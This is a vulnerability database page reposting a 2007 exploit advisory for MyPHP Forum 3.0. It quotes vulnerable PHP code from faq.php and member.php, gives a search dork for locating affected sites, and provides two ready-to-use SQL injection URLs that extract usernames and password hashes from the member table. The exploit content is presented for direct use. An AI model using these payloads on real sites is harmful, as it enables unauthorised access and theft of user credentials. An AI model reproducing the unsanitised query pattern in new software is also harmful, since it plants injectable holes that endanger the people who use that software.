Lucene search

K

myphp-sql.txt

🗓️ 31 Dec 2007 00:00:00Reported by x0ksterType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability in faq.php and member.ph

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`Name : MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability  
Author : x0kster  
Email : [email protected]  
Site : ihteam.net  
Script Download : http://www.myphp.ws/  
Date : 31/12/2007  
Dork : "Powered by: MyPHP Forum"  
  
Note:   
For work, magic_quotes_gpc must be turned off on the server.  
Usally the table prefix is 'nb'.  
  
  
  
Sql injection in faq.php  
  
<?php  
//faq.php  
[...]  
$id = $_GET['id'];  
if($action == "view" && !empty($id)) {  
$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D  
$row = mysql_fetch_array($result);  
$row[answer] = postify($row[answer]);  
[...]  
?>  
  
So we can execute an sql injection thrught the bugged variable $id.  
  
PoC:  
  
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*  
  
  
  
  
Sql injection in member.php  
  
<?php  
//member.php  
[...]  
if($action == "viewpro") {  
$member = $HTTP_GET_VARS['member'];  
$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());  
[...]  
?>  
  
So $member variable isn't controlled so we can exploit it.  
  
PoC:  
  
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Dec 2007 00:00Current
7.4High risk
Vulners AI Score7.4
27
.json
Report